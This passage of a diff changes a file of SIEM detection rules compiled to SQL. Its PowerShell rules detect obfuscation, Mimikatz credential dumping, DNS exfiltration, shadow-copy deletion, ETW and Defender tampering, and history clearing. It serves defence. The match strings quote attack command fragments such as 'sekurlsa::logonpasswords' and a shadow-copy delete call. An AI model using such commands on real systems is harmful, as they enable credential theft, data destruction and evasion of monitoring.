('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": 